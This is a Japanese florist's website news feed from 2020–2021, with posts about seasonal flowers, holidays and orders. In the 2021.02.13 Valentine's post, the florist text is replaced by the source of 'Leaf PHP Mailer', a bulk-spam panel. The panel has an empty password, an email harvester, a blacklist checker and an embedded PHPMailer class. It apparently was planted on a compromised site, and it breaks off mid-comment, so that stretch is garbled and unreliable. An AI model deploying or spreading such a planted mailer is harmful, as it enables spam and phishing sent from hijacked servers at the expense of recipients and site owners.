-
今年の母の日は5/9です2021.04.10
-
今年の母の日は5/9(日)です!今年も多賀城フラワーでは新型コロナウイルス感染拡大防止のため、完全予約制で対応させていただく予定となっております。詳細が決まり次第、随時更新しますので、インスタグラム・ツイッター・フェイスブックのチェックをお忘れなくお願いします!
-
4月4日はイースター☆彡2021.04.03
-
4月4日はイースターです!イースターは英語表記だと「Easter」。日本語訳では「復活祭」と言います。復活祭とは何かというと、イエス・キリストの復活を祝うお祭りです。キリストが十字架にかけられて処刑されたことはよく知られていますが、実は処刑後にキリストは復活していると言われています。そのキリストの復活をお祝いしているのが、このイースターというイベントです。キリストが復活したのが日曜日だったということで、イースターの日にちは春分の日以降、最初の満月から数えて最初の日曜日と定められています。具体的な日にちは決まっていないのですね。では今年は何月何日なのかというと、日本を含めて世界で一般的に使われているグレゴリオ暦では、2021年は4月4日がイースターの日となります。ちなみに来年2022年は4月17日です。毎年変わるので、春が近づいてきたらチェックしてみましょう。
-
おうちでお花見のススメ!2021.03.20
-
The cherry blossom season is coming soon this year!Actually, I would like to have a lively cherry-blossom viewing outside, but why not have a cherry-blossom viewing at home this year?We also sell cherry blossom branches, so please feel free to contact us! !!
-
3/14はホワイトデー!2021.03.13
-
3/14はホワイトデーです、うっかり忘れがちですよね…。お返しに一輪花を添えるだけで、ぐっと「準備してきた感」がでてきて喜ばれます!まだ準備ができてない方、1000円以下のミニギフトとしてお花を選んでみてはいかがでしょうか?
-
3月8日「国際女性デー」とは2021.03.06
-
3月8日は国連が決めた「国際女性デー」です。
毎年大人気のミモザも並べますので、ぜひご来店ください!
-
門出のお祝い花承ります!2021.02.27
-
もうすぐ三月、春は出会いと別れの季節ですね。御卒業・ご入学のお祝いにお花を贈りませんか?↓ご注文はこちらから↓https://www.sendai-hanaya.jp/
-
3/8はミモザの日2021.02.20
-
女性に感謝を伝えるイタリアの記念日「Festa della Donna(=女性の日)」別名「ミモザの日」です。
国際女性デーに由来する女性のための日は世界各国にありますが、贈られる花がミモザと決まっているのはイタリアだけ。これは、大戦後初めて迎える1946年の女性の日、イタリアの女性連合によって提唱されました。最初はすみれの花が候補に挙げられていましたが、高価なすみれに対し、ミモザはイタリアに自生する身近な花で、これならば貧富の差に関係なく誰でも身近な女性に感謝の意を表すことができる、とミモザに決まったそうです。
イタリアでは日常のちょっとした時にも花を贈る習慣が根付いていて、街のいたるところに花屋があります。3月8日は街中の花屋にミモザがあふれ、街を歩く人々の手にはミモザが。夫から妻へ、息子から母へだけでなく、同僚の女性に、常連のお客さんに、更には女性同士でもミモザを贈り合います。もらったミモザは、胸につけたり壁に吊るしたりして大切に飾ります。花をもらう機会が多いイタリアの女性たちにとっても、ミモザはちょっと特別な花なのかもしれません。
今が旬のミモザ、店頭に並べておまちしております♪
-
明日はフラワーバレンタインデー!2021.02.13
-
/*** Leaf PHP Mailer by [leafmailer.pw]* @version : 2.8**/$password = ""; // Passwordsession_start();error_reporting(0);set_time_limit(0);ini_set("memory_limit",-1);$leaf['version']="2.8";$leaf['website']="leafmailer.pw";$sessioncode = md5(__FILE__);if(!empty($password) and $_SESSION[$sessioncode] != $password){if (isset($_REQUEST['pass']) and $_REQUEST['pass'] == $password) {$_SESSION[$sessioncode] = $password;}else {print "";exit;}}session_write_close();function leafClear($text,$email){$e = explode('@', $email);$emailuser=$e[0];$emaildomain=$e[1];$text = str_replace("[-time-]", date("m/d/Y h:i:s a", time()), $text);$text = str_replace("[-email-]", $email, $text);$text = str_replace("[-emailuser-]", $emailuser, $text);$text = str_replace("[-emaildomain-]", $emaildomain, $text);$text = str_replace("[-randomletters-]", randString('abcdefghijklmnopqrstuvwxyz'), $text);$text = str_replace("[-randomstring-]", randString('abcdefghijklmnopqrstuvwxyz0123456789'), $text);$text = str_replace("[-randomnumber-]", randString('0123456789'), $text);$text = str_replace("[-randommd5-]", md5(randString('abcdefghijklmnopqrstuvwxyz0123456789')), $text);return $text;}function leafTrim($string){$string=urldecode($string);return stripslashes(trim($string));}function randString($consonants) {$length=rand(12,25);$password = '';for ($i = 0; $i < $length; $i++) {$password .= $consonants[(rand() % strlen($consonants))];}return $password;}function leafMailCheck($email){if (filter_var($email, FILTER_VALIDATE_EMAIL)) return true;else return false;}# Bulit-in BlackList Checkerif(isset($_GET['check_ip'])){if (isset($_GET['host'])){$_GET['host']=explode(",", $_GET['host']);foreach ($_GET['host'] as $host) {if (checkdnsrr($_GET['check_ip'] . "." . $host . ".", "A")) $check= " Listed";else $check= " Clean";print 'document.getElementById("'. $host.'").innerHTML = "'.$check.'";';}exit;}$dnsbl_lookup = ["all.s5h.net","b.barracudacentral.org","bl.spamcop.net","blacklist.woody.ch","bogons.cymru.com","cbl.abuseat.org","cdl.anti-spam.org.cn","combined.abuse.ch","db.wpbl.info","dnsbl-1.uceprotect.net","dnsbl-2.uceprotect.net","dnsbl-3.uceprotect.net","dnsbl.anticaptcha.net","dnsbl.dronebl.org","dnsbl.inps.de","dnsbl.sorbs.net","drone.abuse.ch","duinv.aupads.org","dul.dnsbl.sorbs.net","dyna.spamrats.com","dynip.rothen.com","http.dnsbl.sorbs.net","ips.backscatterer.org","ix.dnsbl.manitu.net","korea.services.net","misc.dnsbl.sorbs.net","noptr.spamrats.com","orvedb.aupads.org","pbl.spamhaus.org","proxy.bl.gweep.ca","psbl.surriel.com","relays.bl.gweep.ca","relays.nether.net","sbl.spamhaus.org","short.rbl.jp","singular.ttk.pte.hu","smtp.dnsbl.sorbs.net","socks.dnsbl.sorbs.net","spam.abuse.ch","spam.dnsbl.anonmails.de","spam.dnsbl.sorbs.net","spam.spamrats.com","spambot.bls.digibase.ca","spamrbl.imp.ch","spamsources.fabel.dk","ubl.lashback.com","ubl.unsubscore.com","virus.rbl.jp","web.dnsbl.sorbs.net","wormrbl.imp.ch","xbl.spamhaus.org","z.mailspike.net","zen.spamhaus.org","zombie.dnsbl.sorbs.net",];$reverse_ip = implode(".", array_reverse(explode(".", $_GET['check_ip'])));$dnsT = count($dnsbl_lookup);leafheader();print '
Leaf PHPMailer Blacklist Checker
';Print "Checking ".$_GET['check_ip']." in $dnsT anti-spam databases:
";$dnsN="";print '';';
for ($i=0; $i < $dnsT; $i=$i+10) {$host="";$hosts="";for($j=$i; $j<$i+10;$j++){$host=$dnsbl_lookup[$j];if(!empty($host)){print "$host Checking .. $hosts .="$host,";}}$dnsN.="";}print 'print $dnsN;exit;}if(isset($_GET['emailfilter'])){if(!empty($_FILES['fileToUpload']['tmp_name'])){$_POST['emailList']= file_get_contents($_FILES["fileToUpload"]["tmp_name"]);}$_POST['emailList']=strtolower($_POST['emailList']);if($_GET['emailfilter']=="ifram"){if ($_POST['resulttype'] == "download"){header("Content-Description: File Transfer");header("Content-Type: application/octet-stream");header("Content-Disposition: attachment; filename=emails".time().".txt");}else {header("Content-Type: text/plain");}if($_POST['submit']=="extract"){$pattern = '/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}/';preg_match_all($pattern, $_POST['emailList'], $matches);foreach ($matches[0] as $email) {print $email."\n";}}elseif ($_POST['submit']=="filter") {$emails=explode("\n", $_POST['emailList']);$keywords=explode("\n", strtolower($_POST['keywords']));foreach ($emails as $email) {foreach ($keywords as $keyword ) {if(strstr($email, $keyword) ){print $email."\n";break;}}}}exit;}leafheader();print 'Leaf PHPMailer Email Filter
';print 'orShow Result in this pageDownload Result (for big numbers)Detecting every email (100%) and order them line by linehotmail.comyahoo.com.co.uk';exit;}$html="checked";$utf8="selected";$bit8="selected";if($_POST['action']=="send" or $_POST['action']=="score"){$senderEmail=leafTrim($_POST['senderEmail']);$senderName=leafTrim($_POST['senderName']);$replyTo=leafTrim($_POST['replyTo']);$subject=leafTrim($_POST['subject']);$emailList=leafTrim($_POST['emailList']);$messageType=leafTrim($_POST['messageType']);$messageLetter=leafTrim($_POST['messageLetter']);$encoding = $_POST['encode'];$charset = $_POST['charset'];$html="";$utf8="";$bit8="";if($messageType==2) $plain="checked";else $html="checked";if($charset=="ISO-8859-1") $iso="selected";else $utf8="selected";if($encoding=="7bit") $bit7="selected";elseif($encoding=="binary") $binary="selected";elseif($encoding=="base64") $base64="selected";elseif($encoding=="quoted-printable") $quotedprintable="selected";else $bit8="selected";}if($_POST['action']=="view"){$viewMessage=leafTrim($_POST['messageLetter']);$viewMessage=leafClear($viewMessage,"user@domain.com");if ($_POST['messageType']==2){print "".htmlspecialchars($viewMessage)."
";}else {print $viewMessage;}exit;}if(!isset($_POST['senderEmail'])){$senderEmail="support@".str_replace("www.", "", $_SERVER['HTTP_HOST']);if (!leafMailCheck($senderEmail)) $senderEmail="";}class PHPMailer{/*** The PHPMailer Version number.* @var string*/public $Version = '5.2.28';/*** Email priority.* Options: null (default), 1 = High, 3 = Normal, 5 = low.* When null, the header is not set at all.* @var integer*/public $Priority = null;/*** The character set of the message.* @var string*/public $CharSet = 'iso-8859-1';/*** The MIME Content-type of the message.* @var string*/public $ContentType = 'text/plain';/*** The message encoding.* Options: "8bit", "7bit", "binary", "base64", and "quoted-printable".* @var string*/public $Encoding = '8bit';/*** Holds the most recent mailer error message.* @var string*/public $ErrorInfo = '';/*** The From email address for the message.* @var string*/public $From = 'root@localhost';/*** The From name of the message.* @var string*/public $FromName = 'Root User';/*** The Sender email (Return-Path) of the message.* If not empty, will be sent via -f to sendmail or as 'MAIL FROM' in smtp mode.* @var string*/public $Sender = '';/*** The Return-Path of the message.* If empty, it will be set to either From or Sender.* @var string* @deprecated Email senders should never set a return-path header;* it's the receiver's job (RFC5321 section 4.4), so this no longer does anything.* @link https://tools.ietf.org/html/rfc5321#section-4.4 RFC5321 reference*/public $ReturnPath = '';/*** The Subject of the message.* @var string*/public $Subject = '';/*** An HTML or plain text message body.* If HTML then call isHTML(true).* @var string*/public $Body = '';/*** The plain-text message body.* This body can be read by mail clients that do not have HTML email* capability such as mutt & Eudora.* Clients that can read HTML will view the normal Body.* @var string*/public $AltBody = '';/*** An iCal message part body.* Only supported in simple alt or alt_inline message types* To generate iCal events, use the bundled extras/EasyPeasyICS.php class or iCalcreator* @link http://sprain.ch/blog/downloads/php-class-easypeasyics-create-ical-files-with-php/* @link http://kigkonsult.se/iCalcreator/* @var string*/public $Ical = '';/*** The complete compiled MIME message body.* @access protected* @var string*/protected $MIMEBody = '';/*** The complete compiled MIME message headers.* @var string* @access protected*/protected $MIMEHeader = '';/*** Extra headers that createHeader() doesn't fold in.* @var string* @access protected*/protected $mailHeader = '';/*** Word-wrap the message body to this number of chars.* Set to 0 to not wrap. A useful value here is 78, for RFC2822 section 2.1.1 compliance.* @var integer*/public $WordWrap = 0;/*** Which method to use to send mail.* Options: "mail", "sendmail", or "smtp".* @var string*/public $Mailer = 'mail';/*** The path to the sendmail program.* @var string*/public $Sendmail = '/usr/sbin/sendmail';/*** Whether mail() uses a fully sendmail-compatible MTA.* One which supports sendmail's "-oi -f" options.* @var boolean*/public $UseSendmailOptions = true;/*** Path to PHPMailer plugins.* Useful if the SMTP class is not in the PHP include path.* @var string* @deprecated Should not be needed now there is an autoloader.*/public $PluginDir = '';/*** The email address that a reading confirmation should be sent to, also known as read receipt.* @var string*/public $ConfirmReadingTo = '';/*** The hostname to use in the Message-ID header and as default HELO string.* If empty, PHPMailer attempts to find one with, in order,* $_SERVER['SERVER_NAME'], gethostname(), php_uname('n'), or the value* 'localhost.localdomain'.* @var string*/public $Hostname = '';/*** An ID to be used in the Message-ID header.* If empty, a unique id will be generated.* You can set your own, but it must be in the format "", * as defined in RFC5322 section 3.6.4 or it will be ignored.* @see https://tools.ietf.org/html/rfc5322#section-3.6.4* @var string*/public $MessageID = '';/*** The message Date to be used in the Date header.* If empty, the current date will be added.* @var string*/public $MessageDate = '';/*** SMTP hosts.* Either a single hostname or multiple semicolon-delimited hostnames.* You can also specify a different port* for each host by using this format: [hostname:port]* (e.g. "smtp1.example.com:25;smtp2.example.com").* You can also specify encryption type, for example:* (e.g. "tls://smtp1.example.com:587;ssl://smtp2.example.com:465").* Hosts will be tried in order.* @var string*/public $Host = 'localhost';/*** The default SMTP server port.* @var integer* @TODO Why is this needed when the SMTP class takes care of it?*/public $Port = 25;/*** The SMTP HELO of the message.* Default is $Hostname. If $Hostname is empty, PHPMailer attempts to find* one with the same method described above for $Hostname.* @var string* @see PHPMailer::$Hostname*/public $Helo = '';/*** What kind of encryption to use on the SMTP connection.* Options: '', 'ssl' or 'tls'* @var string*/public $SMTPSecure = '';/*** Whether to enable TLS encryption automatically if a server supports it,* even if `SMTPSecure` is not set to 'tls'.* Be aware that in PHP >= 5.6 this requires that the server's certificates are valid.* @var boolean*/public $SMTPAutoTLS = true;/*** Whether to use SMTP authentication.* Uses the Username and Password properties.* @var boolean* @see PHPMailer::$Username* @see PHPMailer::$Password*/public $SMTPAuth = false;/*** Options array passed to stream_context_create when connecting via SMTP.* @var array*/public $SMTPOptions = array();/*** SMTP username.* @var string*/public $Username = '';/*** SMTP password.* @var string*/public $Password = '';/*** SMTP auth type.* Options are CRAM-MD5, LOGIN, PLAIN, NTLM, XOAUTH2, attempted in that order if not specified* @var string*/public $AuthType = '';/*** SMTP realm.* Used for NTLM auth* @var string*/public $Realm = '';/*** SMTP workstation.* Used for NTLM auth* @var string*/public $Workstation = '';/*** The SMTP server timeout in seconds.* Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2* @var integer*/public $Timeout = 300;/*** SMTP class debug output mode.* Debug output level.* Options:* * `0` No output* * `1` Commands* * `2` Data and commands* * `3` As 2 plus connection status* * `4` Low-level data output* @var integer* @see SMTP::$do_debug*/public $SMTPDebug = 0;/*** How to handle debug output.* Options:* * `echo` Output plain-text as-is, appropriate for CLI* * `html` Output escaped, line breaks converted to `
`, appropriate for browser output* * `error_log` Output to error log as configured in php.ini** Alternatively, you can provide a callable expecting two params: a message string and the debug level:** $mail->Debugoutput = function($str, $level) {echo "debug level $level; message: $str";};** @var string|callable* @see SMTP::$Debugoutput*/public $Debugoutput = 'echo';/*** Whether to keep SMTP connection open after each message.* If this is set to true then to close the connection* requires an explicit call to smtpClose().* @var boolean*/public $SMTPKeepAlive = false;/*** Whether to split multiple to addresses into multiple messages* or send them all in one message.* Only supported in `mail` and `sendmail` transports, not in SMTP.* @var boolean*/public $SingleTo = false;/*** Storage for addresses when SingleTo is enabled.* @var array* @TODO This should really not be public*/public $SingleToArray = array();/*** Whether to generate VERP addresses on send.* Only applicable when sending via-
春のお花♪ぞくぞく入荷中!2021.02.05
-
まだまだ、寒い日が続きますが、お店にはチューリップやミモザなど春の花が続々と入荷してきています♪ポップで明るい色合いのお花が多いので、一本花瓶に挿すだけでもお部屋に春が訪れますよ♪チューリップなど、ご希望のお色がある場合にはあらかじめご相談くださいませ!皆様に素敵な春が訪れますように…★
-
★Try フラワー!モニターキャンペーン開催中★2021.01.29
-
多賀城フラワー各店では、Try フラワー!モニターキャンペーンに加盟しています。
LINEで行う簡単なアンケートに答えるだけで、2200円分の電子クーポンが抽選であたるチャンスです!キャンペーン詳細は、↓こちらから↓https://nippon-fc.jp/fmonitor2021/?pr=topぜひご参加ください!
-
☆卒業式・卒園式用のお花承ります☆2021.01.23
-
卒業式典に飾る壺活けや、コサージュ、一輪包みなどなど、卒業式を彩るお花の注文受付開始します!市内外の小中学校、式典装飾の実績ありです☆お気軽にご相談ください♪
-
1/31は愛妻の日!2021.01.15
-
愛妻の日は、「妻というもっとも身近な存在を大切にする人が増えると世界はもう少し豊かで平和になるかもしれない」という願いから、 群馬県吾妻郡嬬恋(つまごい)村に本部を構える日本愛妻家協会が独自に定めたものです。
1月の1をアルファベットの「アイ」、31日の31を「サイ」と読み、毎年1月31日には、ステージの上で奥様へ贈る感謝の言葉を叫ぶイベントなど、夫婦のコミュニケーションを深める素敵なイベントが開催されています。愛妻の日に贈るプレゼントは、そのまま贈るのではなく一言でもメッセージを添えて贈るのが効果的です。以下、メッセージの一例を紹介します。
「いつも家族のためにありがとう。疲れて帰ってきても○○の笑顔を見るとホッとします。これからも一緒に歩いていこう」「毎日忙しいのに、美味しい弁当を持たせてくれて本当にありがとう。○○と一緒になれて俺は幸せ者だと思っています。今度ゆっくり食事にでも行こう」奥様に日々の感謝を伝えるチャンスです!ぜひご相談ください!
-
ご成人おめでとうございます2021.01.08
-
新成人の皆さん、ご成人おめでとうございます。今年は、例年とは全く違う雰囲気の成人の日になりそうですね。ですが、おめでたい日に変わりはありません。ぜひ、新成人のみなさんの新たな門出にお花を贈りませんか?
-
年始の営業時間について2021.01.02
-
-
お正月用品販売しています!2020.12.25
-
31日まで営業しておりますので、是非食料品のお買い物のついでにお立ちより下さい。
-
もうすぐクリスマス!2020.12.18
-
クリスマスがいよいよ来週に迫ってきました!おうちクリスマスの準備はできていますか?当店ではおうちクリスマスを彩るポインセチアを様々なサイズでお取り扱いしております!是非お気軽にご相談くださいませ。(クリスマス用のポインセチアのご予約は12/21までとさせていただきます)みなさま素敵なクリスマスをお過ごしください♪
-
クリスマスリースのワークショップを開催しました!2020.12.11
-
12/6、多賀城図書館にて、クリスマスリースつくりのワークショップを開催しました!ご参加いただいた皆様誠にありがとうございました!
-
お正月飾りご予約受付中!2020.12.04
-
今年もお正月飾りのご予約受付を開始しました。迎春アレンジメントや、門松まで様々取り扱っています。まずはお気軽にお問い合わせください!TEL 022-368-3533お正月飾りの注文締め切りは12/26までですのでご注意ください。
-
クリスマスといえばポインセチアです2020.11.27
-
11月もはやすぎようとしています、もうすぐ12月。クリスマスの時期ですね
今回はクリスマスにイメージが強い「ポインセチア」についてご紹介いたします!
ポインセチアとは、クリスマスシーズンによく見かける赤色が特徴のお花です。自生地のメキシコでは、樹高が2~3mほどに生長する常緑性の低木でもあります。
もともとは赤いポインセチアだけでしたが、品種改良が進み今ではピンク色や白色の種類も流通しています。
明治時代に日本にやってきたポインセチアの歴史は100年以上。クリスマスシーズンの11〜12月頃、花屋さん店頭へ行けば、赤や白、ピンクに色付いたポインセチアが見られますよ。
ポインセチアがクリスマスに飾られるようになったのには理由があります。話は、300年以上前の17世紀までさかのぼります。17世紀、メキシコに住み着いたフランシスコ修道会の僧たちがポインセチアと出会います。
そして、ポインセチアの赤は「キリストの血」、緑は「永遠の象徴」、白が「純潔」を表すことから、縁起のよい植物として「ノーチェ・ブエナ(聖夜)」と呼ぶようになりました。最初は、キリストの誕生祭の行列で使われ、徐々にクリスマスの飾りとして世界中に広まっていったといわれています。
また、葉の形がキリスト教の聖地ベツレヘムの星に似ていることからも、クリスマスを象徴する植物として定着していったといわれています。
多賀城フラワーでは、ポインセチアの苗もご用意しております。
(在庫は入荷状況によりますので、まずはお電話にてご相談ください)
LINEにて注文も受け付けております!お気軽にご相談ください。
㈱多賀城フラワー 022-368-3533
-
11/22(日曜日です!)はいい夫婦の日2020.11.20
-
今週の日曜日はいい夫婦の日です!奥様があっと驚くような花束を贈ってみてはいかがでしょうか?配達・ご来店引き取りの場合にもまずはお気軽にお電話にてご相談ください♪㈱多賀城フラワー 022-368-3533
-